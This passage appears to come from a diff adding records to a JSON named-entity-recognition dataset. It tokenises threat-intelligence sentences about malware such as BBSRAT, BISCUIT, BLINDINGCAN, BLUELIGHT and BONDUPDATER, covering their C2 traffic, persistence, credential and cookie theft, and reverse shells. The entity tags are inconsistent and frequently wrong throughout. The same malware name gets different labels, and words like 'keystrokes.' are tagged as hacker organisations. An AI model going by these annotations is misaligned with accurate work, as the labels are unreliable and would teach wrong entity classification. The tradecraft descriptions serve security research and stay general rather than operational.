"O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "B-SecTeam", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "side-loading", + "has", + "been", + "used", + "to", + "execute", + "BBSRAT", + "through", + "a", + "legitimate", + "Citrix", + "executable,", + "ssonsvr.exe.", + "The", + "Citrix", + "executable", + "was", + "dropped", + "along", + "with", + "BBSRAT", + "by", + "the", + "dropper." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BBSRAT", + "uses", + "Expand", + "to", + "decompress", + "a", + "CAB", + "file", + "into", + "executable", + "content." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "can", + "delete", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "BBSRAT", + "can", + "list", + "file", + "and", + "directory", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "can", + "list", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "has", + "been", + "seen", + "loaded", + "into", + "msiexec.exe", + "through", + "process", + "hollowing", + "to", + "hide", + "its", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "has", + "been", + "loaded", + "through", + "DLL", + "side-loading", + "of", + "a", + "legitimate", + "Citrix", + "executable", + "that", + "is", + "set", + "to", + "persist", + "through", + "the", + "Registry", + "Run", + "key", + "location", + "<code>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "can", + "start,", + "stop,", + "or", + "delete", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "uses", + "a", + "custom", + "encryption", + "algorithm", + "on", + "data", + "sent", + "back", + "to", + "the", + "C2", + "server", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BBSRAT", + "can", + "query", + "service", + "configuration", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "uses", + "GET", + "and", + "POST", + "requests", + "over", + "HTTP", + "or", + "HTTPS", + "for", + "command", + "and", + "control", + "to", + "obtain", + "commands", + "and", + "send", + "ZLIB", + "compressed", + "data", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "can", + "modify", + "service", + "configurations." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BISCUIT", + "uses", + "SSL", + "for", + "encrypting", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BISCUIT", + "malware", + "contains", + "a", + "secondary", + "fallback", + "command", + "and", + "control", + "server", + "that", + "is", + "contacted", + "after", + "the", + "primary", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BISCUIT", + "has", + "a", + "command", + "to", + "download", + "a", + "file", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BISCUIT", + "can", + "capture", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "BISCUIT", + "has", + "a", + "command", + "to", + "enumerate", + "running", + "processes", + "and", + "identify", + "their", + "owners." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BISCUIT", + "has", + "a", + "command", + "to", + "periodically", + "take", + "screenshots", + "of", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BISCUIT", + "has", + "a", + "command", + "to", + "collect", + "the", + "processor", + "type,", + "operation", + "system,", + "computer", + "name,", + "and", + "whether", + "the", + "system", + "is", + "a", + "laptop", + "or", + "PC." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BISCUIT", + "has", + "a", + "command", + "to", + "gather", + "the", + "username", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BISCUIT", + "has", + "a", + "command", + "to", + "collect", + "the", + "system", + "`UPTIME`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BISCUIT", + "has", + "a", + "command", + "to", + "launch", + "a", + "command", + "shell", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITSAdmin", + "can", + "be", + "used", + "to", + "create", + "BITS", + "Jobs", + "to", + "launch", + "a", + "malicious", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITSAdmin", + "can", + "be", + "used", + "to", + "create", + "BITS", + "Jobs", + "to", + "upload", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITSAdmin", + "can", + "be", + "used", + "to", + "create", + "BITS", + "Jobs", + "to", + "upload", + "and/or", + "download", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BITSAdmin", + "can", + "be", + "used", + "to", + "create", + "BITS", + "Jobs", + "to", + "upload", + "and/or", + "download", + "files", + "from", + "SMB", + "file", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "BLACKCOFFEE", + "has", + "also", + "obfuscated", + "its", + "C2", + "traffic", + "as", + "normal", + "traffic", + "to", + "sites", + "such", + "as", + "Github." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLACKCOFFEE", + "uses", + "Microsoft’s", + "TechNet", + "Web", + "portal", + "to", + "obtain", + "a", + "dead", + "drop", + "resolver", + "containing", + "an", + "encoded", + "tag", + "with", + "the", + "IP", + "address", + "of", + "a", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLACKCOFFEE", + "has", + "the", + "capability", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "BLACKCOFFEE", + "has", + "the", + "capability", + "to", + "enumerate", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "BLACKCOFFEE", + "uses", + "Microsoft’s", + "TechNet", + "Web", + "portal", + "to", + "obtain", + "an", + "encoded", + "tag", + "containing", + "the", + "IP", + "address", + "of", + "a", + "command", + "and", + "control", + "server", + "and", + "then", + "communicates", + "separately", + "with", + "that", + "IP", + "address", + "for", + "C2.", + "If", + "the", + "C2", + "server", + "is", + "discovered", + "or", + "shut", + "down,", + "the", + "threat", + "actors", + "can", + "update", + "the", + "encoded", + "IP", + "address", + "on", + "TechNet", + "to", + "maintain", + "control", + "of", + "the", + "victims’", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLACKCOFFEE", + "has", + "the", + "capability", + "to", + "discover", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BLACKCOFFEE", + "has", + "the", + "capability", + "to", + "create", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "been", + "signed", + "with", + "code-signing", + "certificates", + "such", + "as", + "CodeRipper." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "uploaded", + "files", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "used", + "AES", + "and", + "XOR", + "to", + "decrypt", + "its", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "obfuscated", + "code", + "using", + "Base64", + "encoding." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "sent", + "user", + "and", + "system", + "information", + "to", + "a", + "C2", + "server", + "via", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "deleted", + "itself", + "and", + "associated", + "artifacts", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "can", + "search,", + "read,", + "write,", + "move,", + "and", + "execute", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "downloaded", + "files", + "to", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "lured", + "victims", + "into", + "executing", + "malicious", + "macros", + "embedded", + "within", + "Microsoft", + "Office", + "documents." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "attempted", + "to", + "hide", + "its", + "payload", + "by", + "using", + "legitimate", + "file", + "names", + "such", + "as", + "\"iconcache.db\"." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "used", + "Rundll32", + "to", + "load", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "loaded", + "and", + "executed", + "DLLs", + "in", + "memory", + "during", + "runtime", + "on", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "been", + "packed", + "with", + "the", + "UPX", + "packer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "been", + "delivered", + "by", + "phishing", + "emails", + "containing", + "malicious", + "Microsoft", + "Office", + "documents." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "encoded", + "its", + "C2", + "traffic", + "with", + "Base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "encrypted", + "its", + "C2", + "traffic", + "with", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "collected", + "from", + "a", + "victim", + "machine", + "the", + "system", + "name,", + "processor", + "information,", + "OS", + "version,", + "and", + "disk", + "information,", + "including", + "type", + "and", + "free", + "space", + "available." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "collected", + "the", + "victim", + "machine's", + "local", + "IP", + "address", + "information", + "and", + "MAC", + "address." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "modified", + "file", + "and", + "directory", + "timestamps." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "used", + "HTTPS", + "over", + "port", + "443", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLINDINGCAN", + "has", + "executed", + "commands", + "via", + "cmd.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "zip", + "files", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "has", + "encoded", + "data", + "into", + "a", + "binary", + "blob", + "using", + "XOR." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "use", + "different", + "cloud", + "providers", + "for", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Area", + "I-Org", + "I-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "collect", + "passwords", + "stored", + "in", + "web", + "browers,", + "including", + "Internet", + "Explorer,", + "Edge,", + "Chrome,", + "and", + "Naver", + "Whale." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Tool", + "B-Way", + "O", + "B-Way", + "B-HackOrg" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "has", + "a", + "XOR-encoded", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "has", + "exfiltrated", + "data", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "uninstall", + "itself." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "enumerate", + "files", + "and", + "collect", + "associated", + "metadata." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "download", + "additional", + "files", + "onto", + "the", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "collect", + "process", + "filenames", + "and", + "SID", + "authority", + "level." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "has", + "captured", + "a", + "screenshot", + "of", + "the", + "display", + "every", + "30", + "seconds", + "for", + "the", + "first", + "5", + "minutes", + "after", + "initiating", + "a", + "C2", + "loop,", + "and", + "then", + "once", + "every", + "five", + "minutes", + "thereafter." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "collect", + "a", + "list", + "of", + "anti-virus", + "products", + "installed", + "on", + "a", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "harvest", + "cookies", + "from", + "Internet", + "Explorer,", + "Edge,", + "Chrome,", + "and", + "Naver", + "Whale", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "check", + "to", + "see", + "if", + "the", + "infected", + "machine", + "has", + "VM", + "tools", + "running." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "has", + "collected", + "the", + "computer", + "name", + "and", + "OS", + "version", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "collect", + "IP", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "collect", + "the", + "username", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "collect", + "the", + "local", + "time", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BLUELIGHT", + "can", + "use", + "HTTP/S", + "for", + "C2", + "using", + "the", + "Microsoft", + "Graph", + "API." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "BONDUPDATER", + "can", + "use", + "DNS", + "and", + "TXT", + "records", + "within", + "its", + "DNS", + "tunneling", + "protocol", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BONDUPDATER", + "uses", + "a", + "DGA", + "to", + "communicate", + "with", + "command", + "and", + "control", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BONDUPDATER", + "uses", + "<code>-windowstyle", + "hidden</code>", + "to", + "conceal", + "a", + "PowerShell", + "window", + "that", + "downloads", + "a", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BONDUPDATER", + "can", + "download", + "or", + "upload", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BONDUPDATER", + "is", + "written", + "in", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BONDUPDATER", + "persists", + "using", + "a", + "scheduled", + "task", + "that", + "executes", + "every", + "minute." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BONDUPDATER", + "can", + "read", + "batch", + "commands", + "in", + "a", + "file", + "sent", + "from", + "its", + "C2", + "server", + "and", + "execute", + "them", + "with", + "cmd.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BOOSTWRITE", + "has", + "been", + "signed", + "by", + "a", + "valid", + "CA." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BOOSTWRITE", + "has", + "exploited", + "the", + "loading", + "of", + "the", + "legitimate", + "Dwrite.dll", + "file", + "by", + "actually", + "loading", + "the", + "gdi", + "library,", + "which", + "then", + "loads", + "the", + "gdiplus", + "library", + "and", + "ultimately", + "loads", + "the", + "local", + "Dwrite", + "dll." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "BOOSTWRITE", + "has", + "used", + "a", + "a", + "32-byte", + "long", + "multi-XOR", + "key", + "to", + "decode", + "data", + "inside", + "its", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BOOSTWRITE", + "has", + "encoded", + "its", + "payloads", + "using", + "a", + "ChaCha", + "stream", + "cipher", + "with", + "a", + "256-bit", + "key", + "and", + "64-bit", + "Initialization", + "vector", + "(IV)", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BOOSTWRITE", + "has", + "used", + "the", + "DWriteCreateFactory()", + "function", + "to", + "load", + "additional", + "modules." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BOOTRASH", + "is", + "a", + "Volume", + "Boot", + "Record", + "(VBR)", + "bootkit", + "that", + "uses", + "the", + "VBR", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BOOTRASH", + "has", + "used", + "unallocated", + "disk", + "space", + "between", + "partitions", + "for", + "a", + "hidden", + "file", + "system", + "that", + "stores", + "components", + "of", + "the", + "Nemesis", + "bootkit." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "BS2005", + "uses", + "Base64", + "encoding", + "for", + "communication", + "in", + "the", + "message", + "body", + "of", + "an", + "HTTP", + "request." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BUBBLEWRAP", + "can", + "communicate", + "using", + "SOCKS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BUBBLEWRAP", + "collects", + "system", + "information,", + "including", + "the", + "operating", + "system", + "version", + "and", + "hostname." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BUBBLEWRAP", + "can", + "communicate", + "using", + "HTTP", + "or", + "HTTPS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BUSHWALK", + "can", + "embed", + "into", + "the", + "legitimate", + "`querymanifest.cgi`", + "file", + "on", + "compromised", + "Ivanti", + "Connect", + "Secure", + "VPNs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BUSHWALK", + "can", + "Base64", + "decode", + "and", + "RC4", + "decrypt", + "malicious", + "payloads", + "sent", + "through", + "a", + "web", + "request’s", + "command", + "parameter." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BUSHWALK", + "can", + "write", + "malicious", + "payloads", + "sent", + "through", + "a", + "web", + "request’s", + "command", + "parameter." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BUSHWALK", + "can", + "encrypt", + "the", + "resulting", + "data", + "generated", + "from", + "C2", + "commands", + "with", + "RC4." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BUSHWALK", + "can", + "modify", + "the", + "`DSUserAgentCap.pm`", + "Perl", + "module", + "on", + "Ivanti", + "Connect", + "Secure", + "VPNs", + "and", + "either", + "activate", + "or", + "deactivate", + "depending", + "on", + "the", + "value", + "of", + "the", + "user", 